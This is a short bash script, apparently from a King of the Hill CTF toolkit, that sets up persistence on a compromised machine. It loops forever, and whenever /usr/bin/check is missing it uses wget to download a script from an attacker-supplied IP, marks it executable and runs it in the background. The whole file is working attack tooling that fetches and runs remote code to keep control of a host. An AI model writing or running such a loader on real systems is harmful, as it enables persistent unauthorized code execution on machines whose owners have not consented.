#!/bin/bash

# Created by @HaruKey :)

# https://github.com/H4ruKey/KOTH

script_path="/usr/bin/check"
ip="$1"

while true; do
    if [ ! -f "$script_path" ]; then
        wget "http://$ip/Scripts/check" -O "$script_path" >/dev/null 2>&1
        chmod +x "$script_path"
        ./"$script_path" &
    else
        :
    fi
done
